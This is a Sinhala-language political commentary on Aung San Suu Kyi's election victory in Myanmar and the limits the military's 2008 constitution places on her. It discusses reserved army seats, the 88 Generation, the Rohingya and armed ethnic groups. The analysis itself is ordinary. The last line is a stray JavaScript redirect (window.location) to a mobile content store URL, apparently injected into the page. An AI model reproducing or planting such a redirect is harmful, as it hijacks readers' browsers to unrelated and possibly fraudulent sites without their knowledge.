සුකි හමුදාවත් එක්ක සම්මුතියකට යාවිද?


suki

මහි

මියන්මාරයේ ප‍්‍රජා තන්ත‍්‍රවාදය සඳහා වූ අරගලයේ සංකේතයක් වූ අවුන් සාන් සුකි දශක දෙකහමාරක් තිස්සේ අපේක්ෂා කළ මොහොත ළඟා වූයේ පසුගිය ඉරිදාය. නොවැම්බර් 8 පැවති මහා මැතිවරණයෙන් ඇයට අඩ සියවසක් තිස්සේ පාලන බලය පැහැර ගෙන සිටි හමුදාව බලයෙන් ඉවත් කිරීමේ පළමු පියවර තැබීමට හැකි විය. කෙසේ හෝ බලයේ රැුඳී සිටීමට උත්සාහගත් විශ‍්‍රාම ගිය හමුදා නිලධාරීන්ගේ මූලිකත්වයෙන් යුත් සහයෝගිතාව සහ සංවර්ධනය සඳහා වූ සංගමයට (USDP) අයත් වූයේ අන්ත පරාජයකි. එම පක්ෂයේ සභාපතිට හෝ සිය අසුන ජයගැනීමට හැකි වූයේ නැත. සුකිගේ නායකත්වයෙන් යුත් ප‍්‍රජාතන්ත‍්‍රවාදය සඳහා වූ ජාතික ලීගයට රටේ හැම ප‍්‍රදේශයකින්ම ලැබී ඇත්තේ සුවිශේෂී ජනවරමකි.

එහෙත් අඩ සියවසක කාලයක් බලයේ සිටි මියන්මාරයේ හමුදාව ජනවරමට හිස නමමින් පාලන බලය ප‍්‍රජාතන්ත‍්‍රවාදී නායිකා සුකිට භාර දීමට සූදානම් ද යන්න බරපතළ සැකයකි. මීට පෙර 1990 දී පැවැත් වූ මහා මැතිවරණයේදීද සුකිගේ නායකත්වයෙන් යුත් ප‍්‍රජාතන්ත‍්‍රවාදය සඳහා වූ ජාතික ලීගය මෙවැනිම ජයක් ලබා ගත් නමුත් ඇයටත් ඇයගේ පක්ෂයේ නායකයන්ටත් විවෘත වූයේ පාර්ලිමේන්තුවේ දොරටු නොව සිරගෙදර දොරටුය. මැතිවරණ ප‍්‍රතිඵල නිකුත් කිරීමත් සමග අත්අඩංගුවට ගැනුණු සුකි දශක දෙකකට අධික කාලයක් තම නිවස තුළම සිරකාරියක් වූවාය. සැමියාගේ අවමඟුලට හෝ යෑමට අවස්ථාවක් හමුදා පාලකයෝ ඇයට ලබා නොදුන්හ.

මෙවර සහයෝගිතාව සහ සංවර්ධන සංගමය එවැනි පියවරක් ගැනීමට සූදානම් නැති බව පෙනෙන්නට ඇත. මුල්ම මැතිවරණ ප‍්‍රතිඵල නිකුත්වීමත් සමග විසුරුවා හරින ලද පාර්ලිමේන්තුවේ කතානායක මැතිවරණ ප‍්‍රතිඵලය කුමක් වුවත් ඊට ගරුකරන බව පැවසුවේය. පක්ෂයේ වැඩ බලන සභාපති තරග කළ ආසනය විශාල වැඩි ඡුන්ද සංඛ්‍යාවකින්් ප‍්‍රජා තන්ත‍්‍රවාදය සඳහා වූ ජාතික ලීගයේ අපේක්ෂකයෙකුට පරාජය වීමෙන් පසු ඔහු එම පරාජය පිළිගත්තේය. හමුදා ප‍්‍රධානි මින් අවුන්ග් හ්ලැයින්ග්ද ‘මැතිවරණයේ ප‍්‍රතිඵලය නොපිළිගැනීමට හේතුවක් නැතැ’යි සඳහන් කෙළේය. අද පවතින ජාතික සහ ජාත්‍යන්තර තත්ත්වය මීට වසර 25කට පෙර පැවති තත්ත්වයට වඩා වෙනස්ව ඇති නිසා මෙවැනි ප‍්‍රකාශයක් කරන්නට ඇතැයි සිතිය හැකිය. එහෙත් 2008දී හමුදා රජය සකස් කොට කඩිමුඩියේ සම්මත කර ගත් ව්‍යවස්ථාව අනුව කුමන ආකාරයේ ආණ්ඩුවක් පිහිටුවුවද සැබෑම තීරණාත්මක බලය හිමිවන්නේ සන්නද්ධ හමුදාවලටය.

2008 ව්‍යවස්ථාව අනුව පහළ මන්ත‍්‍රී මණ්ඩලය නමින් හැඳින්වෙන පාර්ලිමේන්තුවේ මුළු ආසන සංඛ්‍යාවෙන් සියයට 25ක් වෙන්කර ඇත්තේ සන්නද්ධ හමුදාවලටය. ඒ අනුව මහා මැතිවරණයකදී ආණ්ඩුවක් පිහිටුවීම සඳහා විශ‍්‍රාම ගිය හමුදා නිලධාරීන්ගෙන් යුත් සහයෝගිතාව සහ සංවර්ධන සංගමයට ලබාගත යුත්තේ මුළු ආසනවලින් සියයට 15ක් පමණි. මෙවර බොහෝ නිරීක්ෂකයන් විසින් සැලකිය යුතු ප‍්‍රමාණයකට නිදහස් හා සාධාරණයැයි හඳුන්වන මැතිවරණයකට අවස්ථාව ලැබුණේ අවම වශයෙන් හෝ සියයට 15 ඉලක්කය සාක්ෂාත් කර ගැනිමට හැකිවනු ඇතැ’යි යන බලාපොරොත්තුව හමුදාව තුළ තිබූ නිසාය. අනෙක් අතට සුකිගේ නායකත්වයෙන් යුත් ලීගයට රජයක් පිහිටුවීමට අඩුම වශයෙන් මුළු ඡුන්ද ප‍්‍රමාණයෙන් සියයට 67ක් ලබාගත යුතුය. 1990දී මෙන් නොව මෙවර අන්තවාදී බෞද්ධ භික්ෂූන් බොහෝ දෙනෙකු හමුදා රජයට සහාය දීමට ඉදිරිපත්වීම කැපීපෙනෙන සාධකයකි. සුකිගේ පක්ෂයේ සමහර අය, විශේෂයෙන්ම 88 පරම්පරාව යනුවෙන් හැඳින්වෙන කොටස පක්ෂයෙන් ඉවත් කිරීම නිසාත් ඇයට 1990 පැවති තත්ත්වය නැවත ලබාගැනීම අසීරුවනු ඇතැයි විශ්වාසයක්ද තිබිණ. එහෙත් ප‍්‍රකාශිත මැතිවරණ ප‍්‍රතිඵල අනුව අඩ සියවසක කාලයක් හමුදා පාලනය යටතේ පීඩාවට පත් මියන්මාර් ජනතාවට වෙනසක් තදින්ම අවශ්‍ය බව සහතික විය.

88 පරම්පරාව යනුවෙන් හැඳින්වෙන්නේ 1988දී එවකට බලයේ සිටි නේවින්ගේ හමුදා පාලනයට එරෙහිව සටන් කළ තරුණ ශිෂ්‍ය කොටස්ය. ඔවුන්ගේ අරගලය මර්දනය කිරීමට හමුදාවේ නග්න බලයට හැකි වූයේ නැත. හමුදා රජයට 1990 දී මහා මැතිවරණයක් පැවැත්වීමට සිදුවූයේ එම අරගලයේ ප‍්‍රතිඵලයක් වශයෙනි. මෙම අරගලය දැන් යැන්ගුන් නගරය නමින් හැඳින්වෙන රැුන්ගුන් නගරයේ වීදිවල දිගහැරෙන විට සිය රෝගී මව බැලීමට ආපසු මියන්මාරයට (එවක බුරුමය) පැමිණ සිටි අවුන් සාන් සුකි ඊට සහභාගි වූයේ නැත. තරුණයන් ඇයට නායකත්ව කාර්යභාරයක් පිළිගැනීමට ආරාධනය කළද ඇය එය පිළිගත්තේ නැත. එහෙත් මැතිවරණය ප‍්‍රකාශයට පත්වූ පසු ඇය මැතිවරණ සටනට එක්වූවාය. මැතිවරණ ජයග‍්‍රහණයෙන් පසුව නැවතත් හමුදා මර්දනය දියත් වූ විට ඊට මුහුණ දුන්නෝද දැන් වියපත්ව සිටින 88 කණ්ඩායමේ තරුණයෝය. ඔවුන් තවමත් රැුඩිකල් වෙනසක් සඳහා පෙනීසිටින අතර සුකි ඔවුන්ට පක්ෂයේ දොරටු වසා ඇත.

හමුදා පාලනය යටතේ මියන්මාරයේ දේශපාලනය සහ ආර්ථිකය සම්පූර්ණ යෙන්ම පාහේ මෙහෙයවූයේ හමුදාව සහ ඊට සම්බන්ධ ආයතනයි. සමහර ගණන් බැලීම් අනුව රටේ ආර්ථිකයෙන් සියයට 70ක් පාලනය වන්නේ හමුදාවෙන් සහ ඊට සම්බන්ධ ව්‍යාපාරික ආයතනවලිනි.

සුකි මුහුණ දෙන ප‍්‍රථම අභියෝගය වන්නේ ආර්ථිකයේ වෙනසක් කිරීමට අවශ්‍ය ප‍්‍රතිසංස්කරණ හඳුන්වා දීමට හමුදාවේ සහාය ලබා ගැනීමට හැකිද යන්නයි. 2008 ව්‍යවස්ථාවේ මූලික අරමුණක් වන්නේ හමුදාවේ සුපිරි තත්ත්වය දිගටම පවත්වා ගැනීමය. ඒ සඳහා යොදාගත් එක ප‍්‍රතිපාදනයක් වූයේ, සුකි ජනාධිපති ධුරයට පත්වීම වැළැක්වීමේ අරමුණෙන්, ‘විදේශිකයකු සමග විවාහ වී සිටින හෝ තම දරුවන් විදෙස් රටක පුරවැසිභාවය ලබා සිටින අයකුට අගමැති තනතුරට හෝ ජනාධිපති තනතුරට පත්විය නොහැකිය’ යන්නයි. මෙම ප‍්‍රතිපාදනය සංශෝධනය කිරීමට පසුගිය පාර්ලි මේන්තුවේදී උත්සාහයක් ගත් නමුත් එය අසාර්ථක විය. මීට අමතරව කිසියම් ව්‍යවස්ථා සංශෝධනයක් නිශේධ කිරීමේ බලයක්ද හමුදාවට ලබාදීම නිසා කුමන හෝ ව්‍යවස්ථා සංශෝධනයක් ගෙනඒමේදී හමුදාවේ සහාය අනිවාර්යය. පාර්ලිමේන්තු මැති වරණයෙන් ජයගතහොත් ව්‍යවස්ථාවේ කුමක් සඳහන් වුවද පාලනය මෙහෙයවන්නේ තමායැයි සුකි මැතිවරණ සමයේදී ප‍්‍රකාශ කළද හමුදාවේ අනුමැතිය නැතිව එය පහසු කාර්යයක් නොවනු ඇත.

අවුන්ග් සාන් සුකිගේ ජනවරම සැබෑවටම අභියෝගයට ලක්වන්නේ ලබන වසරේ මාර්තු මාසයේ දී පැවැත්වෙන ජනාධිපති තෝරාගැනීමේ ඡන්ද විමසීමෙනිි. ඇයට ලැබී ඇති ජනවරම අනුව ජනාධිපති තනතුරට තේරී පත්වීම අපහසුවක් නොවන නමුත් ව්‍යවස්ථාවෙන් පනවා ඇති බාධක ජයගැනීම පහසු නොවේ. ජනබලය නොසලකා කටයුතු කිරීමේ හැකියාව පෙන්නුම්කර ඇති හමුදාවට සන්නද්ධ බලයෙන් සුකිගේ අපේක්ෂාව යටපත් කිරීමට ශක්තියක් පවතී. එම බලය යොදාගැනීමෙන් හමුදාව වැළැක්වීමට නම් සුකිට ඔවුන් සමග සමහර සම්මුතීන්ට එළැඹීමට සිදුවනු ඇත. එහෙත් ජනතා අපේක්ෂා ඉටුකිරීමත් හමුදාව සැනසීමත් එකවර කළ හැකි දෙයක් නොවේ. 2012 පැවති අතුරු මැතිවරණයකින් ප‍්‍රථම වරට පාර්ලිමේන්තුවට තේරී පත්වූ අවුන් සාන් සුකි බරපතළ ප‍්‍රශ්නවලදී ගැටුම්කාරී ස්ථාවර ගැනීමෙන් වැළකී සිටියාය.

මියන්මාර ජනතාවගේ මානව අයිතිවාසිකම් තහවුරු කිරීමේ අවශ්‍යතාව ඇය 90 දශකයේ සිටම අවධාරණය කළ මූලික කරුණකි. ඇය මුලින්ම ඉදිරිපත් කළ ‘බියෙන් අත්මිදෙමු’ සටන් පාඨයෙන් අදහස් කෙළේ සියලූ ජනතාවගේ මූලික අයිතිවාසිකම් දිනාගැනීමේ ශුද්ධවූ අයිතියයි. එහෙත් මුස්ලිම් ආගමික රොහින්ගියා ජනකොටසේ අයිතිවාසිකම් පිළිබඳ ප‍්‍රශ්නය මතුවූ විට ඇය අනුගමනය කෙළේ නිහඬ පිළිවෙතකි. සාමය පිළිබඳව නොබෙල් ත්‍යාගය හිමිව තිබුණද, රොහින්ගියා ජනකොටසේ අයිතිවාසිකම් අහිමි කිරීම ජාත්‍යන්තරව දැඩි විවේචනයට ලක්වුවද ඇය ඒ ගැන කතා කිරීම පවා මගහැරියාය. මෙවර ඡුන්ද විමසීම පැවැත්වූයේ දශලක්ෂයකට ආසන්න රොහින්ගියා ජනකොටසක් අවතැන්ව සිටියදීය. ඔවුන් නීති විරෝධී සංක‍්‍රමණිකයන් ලෙස සලකා පුරවැසි අයිතිය හා ඡුන්ද බලයද අහිමි කෙරිණ. 2010 පැවති ඡුන්ද විමසීමේදී ඡුන්ද බලය හිමිව තිබූ රොහින්ගියා ජනකොටසේ 750,000කට මෙවර ඡුන්ද බලය ලැබුණේ නැත. පසුගිය ඡුන්ද විමසීමේදී පාර්ලිමේන්තුවට තේරීපත්වූ රොහින්ගියා මන්ත‍්‍රීවරුන්ටත් මෙවර ඡුන්ද බලය හෝ ලැබුණේ නැත.

සුකිගේ පාලනයේ උරගලක් වන්නේ සුළුජාතික අයිතිවාසිකම්ය. දශ ලක්ෂ 52ක්වූ මියන්මාර ජන සංඛ්‍යාවෙන් සියයට 40ක්ම සුළු ජනවාර්ගිකයන්ය. මින් සමහර ජනවාර්ගික කණ්ඩායම් ස්වාධීනත්වය ඉල්ලා දිගු කලක් තිස්සේම සන්නද්ධ අරගලයක යෙදී සිටියහ. ජනාධිපති තීන් සීන් මහා මැතිවරණයට පෙර මින් සමහර කණ්ඩායම් සමග සාම ගිවිසුම් අත්සන් කළ නමුත් තවත් සමහර කණ්ඩායම් තවම අරගලය අත්හැර නැත. ඉන් කැපීපෙනෙන කණ්ඩායම් දෙකක් වන්නේ වා සහ කචින්ය.

මෙවැනි සුළු වාර්ගික කණ්ඩායම්වල සාධාරණ ඉල්ලීම්වලට නිසි විසඳුමක් නැතිව නව පාලනයකට දේශපාලන හෝ ආර්ථික වෙනස්කම් හඳුන්වාදීම පහසු නොවේ. ඒ සඳහා මූලික පිවිසුමක් වන්නේ සියලූ ජනකොටස්වල සාධාරණ අයිතිවාසිකම් තහවුරු කෙරෙන ව්‍යවස්ථා රාමුවක් සකස් කිරීමය. එැවැනි පියවරකට සන්නද්ධ හමුදාවලින් සහ බෞද්ධ අන්තවාදි කොටස්වල සහාය ලබාගැනීමට ඇයට හැකිවේද යන්න තීරණාත්මක සාධකයකි. අයිතිවාසිකම් පිළිබඳව මූලික වෙනසක් සිදුනොවන්නේ නම් ඇයගේ පාලනය කලින් පැවති පාලනයන්ගෙන් වෙනස් නොවනු ඇත.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;